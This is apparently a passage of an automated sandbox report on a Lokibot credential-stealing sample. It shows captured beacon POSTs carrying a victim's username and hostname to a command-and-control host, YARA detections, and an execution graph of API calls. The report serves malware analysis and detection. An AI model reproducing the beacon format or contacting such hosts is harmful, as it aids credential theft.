                Jan 28, 2022 23:37:29.329364061 CET | 1372 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:30.738581896 CET | 1373 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:11 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                8 | 192.168.2.6 | 49780 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:33.962521076 CET | 1373 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:34.029126883 CET | 1374 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:35.373624086 CET | 1381 | IN | HTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                9 | 192.168.2.6 | 49782 | 185.185.69.76 | 80 | C:\Users\user\Desktop\kVijllv0Yl.exe
                Timestamp | kBytes transferred | Direction | Data
                Jan 28, 2022 23:37:36.594727993 CET | 1382 | OUT | POST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:36.663120031 CET1382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:37.913034916 CET1382INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:18 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.



                Target ID: 0
                Start time: 23:36:56
                Start date: 28/01/2022
                Path: C:\Users\user\Desktop\kVijllv0Yl.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\kVijllv0Yl.exe"
                Imagebase: 0x400000
                File size: 247353 bytes
                MD5 hash: 6997DE404FB7E798AECC2C8A14FD2F12
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: low

                Target ID: 1
                Start time: 23:36:58
                Start date: 28/01/2022
                Path: C:\Users\user\Desktop\kVijllv0Yl.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\kVijllv0Yl.exe"
                Imagebase: 0x400000
                File size: 247353 bytes
                MD5 hash: 6997DE404FB7E798AECC2C8A14FD2F12
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation: low


                  Execution Graph

                  Execution Coverage: 20.1%
                  Dynamic/Decrypted Code Coverage: 6.8%
                  Signature Coverage: 22.7%
                  Total number of Nodes: 1344
                  Total number of Limit Nodes: 33
4779->4780 4780->4782 4783 405a85 lstrcpynA 4780->4783 4782->4777 4782->4778 4783->4782 4505 402419 4515 402af2 4505->4515 4507 402423 4508 4029cb 18 API calls 4507->4508 4509 40242c 4508->4509 4510 402443 RegEnumKeyA 4509->4510 4511 40244f RegEnumValueA 4509->4511 4512 40264e 4509->4512 4513 402468 RegCloseKey 4510->4513 4511->4512 4511->4513 4513->4512 4516 4029e8 18 API calls 4515->4516 4517 402b0b 4516->4517 4518 402b19 RegOpenKeyExA 4517->4518 4518->4507 4791 402299 4792 4022c9 4791->4792 4793 40229e 4791->4793 4795 4029e8 18 API calls 4792->4795 4794 402af2 19 API calls 4793->4794 4796 4022a5 4794->4796 4797 4022d0 4795->4797 4798 4029e8 18 API calls 4796->4798 4801 4022e6 4796->4801 4802 402a28 RegOpenKeyExA 4797->4802 4799 4022b6 RegDeleteValueA RegCloseKey 4798->4799 4799->4801 4803 402a53 4802->4803 4810 402a9f 4802->4810 4804 402a79 RegEnumKeyA 4803->4804 4805 402a8b RegCloseKey 4803->4805 4806 402ab0 RegCloseKey 4803->4806 4808 402a28 3 API calls 4803->4808 4804->4803 4804->4805 4807 405da3 3 API calls 4805->4807 4806->4810 4809 402a9b 4807->4809 4808->4803 4809->4810 4811 402acb RegDeleteKeyA 4809->4811 4810->4801 4811->4810 4519 401e1b 4520 4029e8 18 API calls 4519->4520 4521 401e21 4520->4521 4522 404e23 25 API calls 4521->4522 4523 401e2b 4522->4523 4524 4052e5 2 API calls 4523->4524 4528 401e31 4524->4528 4525 401e87 CloseHandle 4527 40264e 4525->4527 4526 401e50 WaitForSingleObject 4526->4528 4529 401e5e GetExitCodeProcess 4526->4529 4528->4525 4528->4526 4528->4527 4530 405ddc 2 API calls 4528->4530 4531 401e70 4529->4531 4532 401e79 4529->4532 4530->4526 4534 4059e3 wsprintfA 4531->4534 4532->4525 4534->4532 4535 401d1b GetDC GetDeviceCaps 4536 4029cb 18 API calls 4535->4536 4537 401d37 MulDiv 4536->4537 4538 4029cb 18 API calls 4537->4538 4539 401d4c 4538->4539 4540 405aa7 18 API calls 4539->4540 4541 401d85 CreateFontIndirectA 4540->4541 4542 4024aa 4541->4542 3417 401721 3418 4029e8 18 API calls 3417->3418 3419 401728 3418->3419 3423 40578b 
3419->3423 3421 40172f 3422 40578b 2 API calls 3421->3422 3422->3421 3424 405796 GetTickCount GetTempFileNameA 3423->3424 3425 4057c2 3424->3425 3426 4057c6 3424->3426 3425->3424 3425->3426 3426->3421 4812 4023a1 4813 402af2 19 API calls 4812->4813 4814 4023ab 4813->4814 4815 4029e8 18 API calls 4814->4815 4816 4023b4 4815->4816 4817 4023be RegQueryValueExA 4816->4817 4820 40264e 4816->4820 4818 4023e4 RegCloseKey 4817->4818 4819 4023de 4817->4819 4818->4820 4819->4818 4823 4059e3 wsprintfA 4819->4823 4823->4818 4543 401922 4544 4029e8 18 API calls 4543->4544 4545 401929 lstrlenA 4544->4545 4546 4024aa 4545->4546 3566 403225 #17 SetErrorMode OleInitialize 3636 405da3 GetModuleHandleA 3566->3636 3570 403293 GetCommandLineA 3641 405a85 lstrcpynA 3570->3641 3572 4032a5 GetModuleHandleA 3573 4032bc 3572->3573 3574 4055a3 CharNextA 3573->3574 3575 4032d0 CharNextA 3574->3575 3580 4032dd 3575->3580 3576 403346 3577 403359 GetTempPathA 3576->3577 3642 4031f1 3577->3642 3579 40336f 3581 403393 DeleteFileA 3579->3581 3582 403373 GetWindowsDirectoryA lstrcatA 3579->3582 3580->3576 3583 4055a3 CharNextA 3580->3583 3587 403348 3580->3587 3650 402c5b GetTickCount GetModuleFileNameA 3581->3650 3584 4031f1 11 API calls 3582->3584 3583->3580 3586 40338f 3584->3586 3586->3581 3596 40340d 3586->3596 3735 405a85 lstrcpynA 3587->3735 3588 4033a4 3593 4055a3 CharNextA 3588->3593 3588->3596 3624 4033fd 3588->3624 3597 4033bb 3593->3597 3594 403426 3598 405346 MessageBoxIndirectA 3594->3598 3595 40350b 3599 40358e ExitProcess 3595->3599 3602 405da3 3 API calls 3595->3602 3752 4035a6 3596->3752 3603 4033d8 3597->3603 3604 40343c lstrcatA lstrcmpiA 3597->3604 3601 403434 ExitProcess 3598->3601 3605 40351a 3602->3605 3736 405659 3603->3736 3604->3596 3608 403458 CreateDirectoryA SetCurrentDirectoryA 3604->3608 3606 405da3 3 API calls 3605->3606 3609 403523 3606->3609 3611 40347a 3608->3611 3612 40346f 3608->3612 3613 405da3 3 API calls 3609->3613 3760 405a85 lstrcpynA 3611->3760 3759 405a85 
lstrcpynA 3612->3759 3616 40352c 3613->3616 3618 40357a ExitWindowsEx 3616->3618 3623 40353a GetCurrentProcess 3616->3623 3618->3599 3622 403587 3618->3622 3619 4033f2 3751 405a85 lstrcpynA 3619->3751 3621 405aa7 18 API calls 3625 4034aa DeleteFileA 3621->3625 3790 40140b 3622->3790 3628 40354a 3623->3628 3680 4035e3 3624->3680 3627 4034b7 CopyFileA 3625->3627 3633 403488 3625->3633 3627->3633 3628->3618 3629 4034ff 3631 4057d3 38 API calls 3629->3631 3631->3596 3632 405aa7 18 API calls 3632->3633 3633->3621 3633->3629 3633->3632 3635 4034eb CloseHandle 3633->3635 3761 4057d3 3633->3761 3787 4052e5 CreateProcessA 3633->3787 3635->3633 3637 405dca GetProcAddress 3636->3637 3638 405dbf LoadLibraryA 3636->3638 3639 403268 SHGetFileInfoA 3637->3639 3638->3637 3638->3639 3640 405a85 lstrcpynA 3639->3640 3640->3570 3641->3572 3643 405ce3 5 API calls 3642->3643 3645 4031fd 3643->3645 3644 403207 3644->3579 3645->3644 3646 405578 3 API calls 3645->3646 3647 40320f CreateDirectoryA 3646->3647 3648 40578b 2 API calls 3647->3648 3649 403223 3648->3649 3649->3579 3793 40575c GetFileAttributesA CreateFileA 3650->3793 3652 402c9e 3679 402cab 3652->3679 3794 405a85 lstrcpynA 3652->3794 3654 402cc1 3795 4055bf lstrlenA 3654->3795 3658 402cd2 GetFileSize 3659 402dd3 3658->3659 3678 402ce9 3658->3678 3660 402bc5 32 API calls 3659->3660 3662 402dda 3660->3662 3661 4031a8 ReadFile 3661->3678 3664 402e16 GlobalAlloc 3662->3664 3662->3679 3800 4031da SetFilePointer 3662->3800 3663 402e6e 3667 402bc5 32 API calls 3663->3667 3666 402e2d 3664->3666 3671 40578b 2 API calls 3666->3671 3667->3679 3668 402df7 3669 4031a8 ReadFile 3668->3669 3672 402e02 3669->3672 3670 402bc5 32 API calls 3670->3678 3673 402e3e CreateFileA 3671->3673 3672->3664 3672->3679 3674 402e78 3673->3674 3673->3679 3801 4031da SetFilePointer 3674->3801 3676 402e86 3677 402f01 47 API calls 3676->3677 3677->3679 3678->3659 3678->3661 3678->3663 3678->3670 3678->3679 3679->3588 3681 405da3 3 API calls 3680->3681 3682 4035f7 
3681->3682 3683 4035fd 3682->3683 3684 40360f 3682->3684 3811 4059e3 wsprintfA 3683->3811 3685 40596c 3 API calls 3684->3685 3686 403630 3685->3686 3688 40364e lstrcatA 3686->3688 3690 40596c 3 API calls 3686->3690 3689 40360d 3688->3689 3802 403897 3689->3802 3690->3688 3693 405659 18 API calls 3694 403676 3693->3694 3695 4036ff 3694->3695 3697 40596c 3 API calls 3694->3697 3696 405659 18 API calls 3695->3696 3698 403705 3696->3698 3699 4036a2 3697->3699 3700 403715 LoadImageA 3698->3700 3701 405aa7 18 API calls 3698->3701 3699->3695 3705 4036be lstrlenA 3699->3705 3709 4055a3 CharNextA 3699->3709 3702 403740 RegisterClassA 3700->3702 3703 4037c9 3700->3703 3701->3700 3706 40377c SystemParametersInfoA CreateWindowExA 3702->3706 3707 4037d3 3702->3707 3704 40140b 2 API calls 3703->3704 3708 4037cf 3704->3708 3710 4036f2 3705->3710 3711 4036cc lstrcmpiA 3705->3711 3706->3703 3707->3596 3708->3707 3716 403897 19 API calls 3708->3716 3713 4036bc 3709->3713 3712 405578 3 API calls 3710->3712 3711->3710 3714 4036dc GetFileAttributesA 3711->3714 3717 4036f8 3712->3717 3713->3705 3715 4036e8 3714->3715 3715->3710 3718 4055bf 2 API calls 3715->3718 3719 4037e0 3716->3719 3812 405a85 lstrcpynA 3717->3812 3718->3710 3721 403864 3719->3721 3722 4037e8 ShowWindow LoadLibraryA 3719->3722 3813 404ef5 OleInitialize 3721->3813 3723 403807 LoadLibraryA 3722->3723 3724 40380e GetClassInfoA 3722->3724 3723->3724 3726 403822 GetClassInfoA RegisterClassA 3724->3726 3727 403838 DialogBoxParamA 3724->3727 3726->3727 3731 40140b 2 API calls 3727->3731 3728 40386a 3729 403886 3728->3729 3730 40386e 3728->3730 3732 40140b 2 API calls 3729->3732 3730->3707 3734 40140b 2 API calls 3730->3734 3733 403860 3731->3733 3732->3707 3733->3707 3734->3707 3735->3577 3828 405a85 lstrcpynA 3736->3828 3738 40566a 3739 40560c 4 API calls 3738->3739 3740 405670 3739->3740 3741 4033e3 3740->3741 3742 405ce3 5 API calls 3740->3742 3741->3596 3750 405a85 lstrcpynA 3741->3750 3747 405680 3742->3747 3743 4056ab 
lstrlenA 3744 4056b6 3743->3744 3743->3747 3746 405578 3 API calls 3744->3746 3745 405d7c 2 API calls 3745->3747 3748 4056bb GetFileAttributesA 3746->3748 3747->3741 3747->3743 3747->3745 3749 4055bf 2 API calls 3747->3749 3748->3741 3749->3743 3750->3619 3751->3624 3753 4035c1 3752->3753 3754 4035b7 CloseHandle 3752->3754 3755 4035d5 3753->3755 3756 4035cb CloseHandle 3753->3756 3754->3753 3829 4053aa 3755->3829 3756->3755 3759->3611 3760->3633 3762 405da3 3 API calls 3761->3762 3763 4057de 3762->3763 3764 40583b GetShortPathNameA 3763->3764 3767 405930 3763->3767 3872 40575c GetFileAttributesA CreateFileA 3763->3872 3766 405850 3764->3766 3764->3767 3766->3767 3769 405858 wsprintfA 3766->3769 3767->3633 3768 40581f CloseHandle GetShortPathNameA 3768->3767 3770 405833 3768->3770 3771 405aa7 18 API calls 3769->3771 3770->3764 3770->3767 3772 405880 3771->3772 3873 40575c GetFileAttributesA CreateFileA 3772->3873 3774 40588d 3774->3767 3775 40589c GetFileSize GlobalAlloc 3774->3775 3776 405929 CloseHandle 3775->3776 3777 4058ba ReadFile 3775->3777 3776->3767 3777->3776 3778 4058ce 3777->3778 3778->3776 3874 4056d1 lstrlenA 3778->3874 3781 4058e3 3879 405a85 lstrcpynA 3781->3879 3782 40593d 3783 4056d1 4 API calls 3782->3783 3785 4058f1 3783->3785 3786 405904 SetFilePointer WriteFile GlobalFree 3785->3786 3786->3776 3788 405320 3787->3788 3789 405314 CloseHandle 3787->3789 3788->3633 3789->3788 3791 401389 2 API calls 3790->3791 3792 401420 3791->3792 3792->3599 3793->3652 3794->3654 3796 4055cc 3795->3796 3797 4055d1 CharPrevA 3796->3797 3798 402cc7 3796->3798 3797->3796 3797->3798 3799 405a85 lstrcpynA 3798->3799 3799->3658 3800->3668 3801->3676 3803 4038ab 3802->3803 3820 4059e3 wsprintfA 3803->3820 3805 40391c 3806 405aa7 18 API calls 3805->3806 3807 403928 SetWindowTextA 3806->3807 3808 403944 3807->3808 3809 40365e 3807->3809 3808->3809 3810 405aa7 18 API calls 3808->3810 3809->3693 3810->3808 3811->3689 3812->3695 3821 403e83 3813->3821 3815 404f3f 3816 403e83 
SendMessageA 3815->3816 3817 404f51 OleUninitialize 3816->3817 3817->3728 3819 404f18 3819->3815 3824 401389 3819->3824 3820->3805 3822 403e9b 3821->3822 3823 403e8c SendMessageA 3821->3823 3822->3819 3823->3822 3826 401390 3824->3826 3825 4013fe 3825->3819 3826->3825 3827 4013cb MulDiv SendMessageA 3826->3827 3827->3826 3828->3738 3830 405659 18 API calls 3829->3830 3831 4053be 3830->3831 3832 4053c7 DeleteFileA 3831->3832 3833 4053de 3831->3833 3834 403416 OleUninitialize 3832->3834 3835 40551d 3833->3835 3870 405a85 lstrcpynA 3833->3870 3834->3594 3834->3595 3835->3834 3841 405d7c 2 API calls 3835->3841 3837 405408 3838 405419 3837->3838 3839 40540c lstrcatA 3837->3839 3840 4055bf 2 API calls 3838->3840 3842 40541f 3839->3842 3840->3842 3844 405538 3841->3844 3843 40542d lstrcatA 3842->3843 3845 405438 lstrlenA FindFirstFileA 3842->3845 3843->3845 3844->3834 3847 405578 3 API calls 3844->3847 3846 405513 3845->3846 3850 40545c 3845->3850 3846->3835 3849 405542 3847->3849 3848 4055a3 CharNextA 3848->3850 3851 40573d 2 API calls 3849->3851 3850->3848 3857 4054f2 FindNextFileA 3850->3857 3863 40573d 2 API calls 3850->3863 3864 4053aa 59 API calls 3850->3864 3867 404e23 25 API calls 3850->3867 3868 404e23 25 API calls 3850->3868 3869 4057d3 38 API calls 3850->3869 3871 405a85 lstrcpynA 3850->3871 3852 405548 RemoveDirectoryA 3851->3852 3853 405553 3852->3853 3854 40556a 3852->3854 3853->3834 3855 405559 3853->3855 3856 404e23 25 API calls 3854->3856 3859 404e23 25 API calls 3855->3859 3856->3834 3857->3850 3860 40550a FindClose 3857->3860 3861 405561 3859->3861 3860->3846 3862 4057d3 38 API calls 3861->3862 3865 405568 3862->3865 3866 4054bf DeleteFileA 3863->3866 3864->3850 3865->3834 3866->3850 3867->3857 3868->3850 3869->3850 3870->3837 3871->3850 3872->3768 3873->3774 3875 405707 lstrlenA 3874->3875 3876 405711 3875->3876 3877 4056e5 lstrcmpiA 3875->3877 3876->3781 3876->3782 3877->3876 3878 4056fe CharNextA 3877->3878 3878->3875 3879->3785 4824 401ca5 4825 
4029cb 18 API calls 4824->4825 4826 401cb5 SetWindowLongA 4825->4826 4827 40287d 4826->4827 4547 401a26 4548 4029cb 18 API calls 4547->4548 4549 401a2c 4548->4549 4550 4029cb 18 API calls 4549->4550 4551 4019d6 4550->4551 4828 4045aa 4829 4045d6 4828->4829 4830 4045ba 4828->4830 4832 404609 4829->4832 4833 4045dc SHGetPathFromIDListA 4829->4833 4839 40532a GetDlgItemTextA 4830->4839 4835 4045f3 SendMessageA 4833->4835 4836 4045ec 4833->4836 4834 4045c7 SendMessageA 4834->4829 4835->4832 4837 40140b 2 API calls 4836->4837 4837->4835 4839->4834 4552 402b2d 4553 402b55 4552->4553 4554 402b3c SetTimer 4552->4554 4555 402ba3 4553->4555 4556 402ba9 MulDiv 4553->4556 4554->4553 4557 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4556->4557 4557->4555 4840 401bad 4841 4029cb 18 API calls 4840->4841 4842 401bb4 4841->4842 4843 4029cb 18 API calls 4842->4843 4844 401bbe 4843->4844 4845 401bce 4844->4845 4846 4029e8 18 API calls 4844->4846 4847 401bde 4845->4847 4848 4029e8 18 API calls 4845->4848 4846->4845 4849 401be9 4847->4849 4850 401c2d 4847->4850 4848->4847 4851 4029cb 18 API calls 4849->4851 4852 4029e8 18 API calls 4850->4852 4853 401bee 4851->4853 4854 401c32 4852->4854 4855 4029cb 18 API calls 4853->4855 4856 4029e8 18 API calls 4854->4856 4857 401bf7 4855->4857 4858 401c3b FindWindowExA 4856->4858 4859 401c1d SendMessageA 4857->4859 4860 401bff SendMessageTimeoutA 4857->4860 4861 401c59 4858->4861 4859->4861 4860->4861 4559 40422e 4560 404264 4559->4560 4561 40423e 4559->4561 4563 403e9e 8 API calls 4560->4563 4562 403e37 19 API calls 4561->4562 4564 40424b SetDlgItemTextA 4562->4564 4565 404270 4563->4565 4564->4560 4566 402630 4567 4029e8 18 API calls 4566->4567 4568 402637 FindFirstFileA 4567->4568 4569 40265a 4568->4569 4573 40264a 4568->4573 4571 402661 4569->4571 4574 4059e3 wsprintfA 4569->4574 4575 405a85 lstrcpynA 4571->4575 4574->4571 4575->4573 4862 4024b0 4863 4024b5 4862->4863 4864 4024c6 4862->4864 4865 4029cb 18 API calls 4863->4865 4866 4029e8 18 
API calls 4864->4866 4867 4024bc 4865->4867 4868 4024cd lstrlenA 4866->4868 4869 4024ec WriteFile 4867->4869 4870 40264e 4867->4870 4868->4867 4869->4870 3427 4015b3 3428 4029e8 18 API calls 3427->3428 3429 4015ba 3428->3429 3445 40560c CharNextA CharNextA 3429->3445 3431 40160a 3432 40162d 3431->3432 3433 40160f 3431->3433 3438 401423 25 API calls 3432->3438 3435 401423 25 API calls 3433->3435 3434 4055a3 CharNextA 3436 4015d0 CreateDirectoryA 3434->3436 3437 401616 3435->3437 3439 4015e5 GetLastError 3436->3439 3443 4015c2 3436->3443 3451 405a85 lstrcpynA 3437->3451 3441 40215b 3438->3441 3442 4015f2 GetFileAttributesA 3439->3442 3439->3443 3442->3443 3443->3431 3443->3434 3444 401621 SetCurrentDirectoryA 3444->3441 3446 405626 3445->3446 3448 405632 3445->3448 3447 40562d CharNextA 3446->3447 3446->3448 3450 40564f 3447->3450 3449 4055a3 CharNextA 3448->3449 3448->3450 3449->3448 3450->3443 3451->3444 3452 401734 3453 4029e8 18 API calls 3452->3453 3454 40173b 3453->3454 3455 401761 3454->3455 3456 401759 3454->3456 3507 405a85 lstrcpynA 3455->3507 3506 405a85 lstrcpynA 3456->3506 3459 40175f 3463 405ce3 5 API calls 3459->3463 3460 40176c 3508 405578 lstrlenA CharPrevA 3460->3508 3469 40177e 3463->3469 3467 401795 CompareFileTime 3467->3469 3468 401859 3470 404e23 25 API calls 3468->3470 3469->3467 3469->3468 3472 405a85 lstrcpynA 3469->3472 3479 405aa7 18 API calls 3469->3479 3488 401830 3469->3488 3490 40575c GetFileAttributesA CreateFileA 3469->3490 3511 405d7c FindFirstFileA 3469->3511 3514 40573d GetFileAttributesA 3469->3514 3517 405346 3469->3517 3473 401863 3470->3473 3471 404e23 25 API calls 3474 401845 3471->3474 3472->3469 3491 402f01 3473->3491 3477 40188a SetFileTime 3478 40189c FindCloseChangeNotification 3477->3478 3478->3474 3480 4018ad 3478->3480 3479->3469 3481 4018b2 3480->3481 3482 4018c5 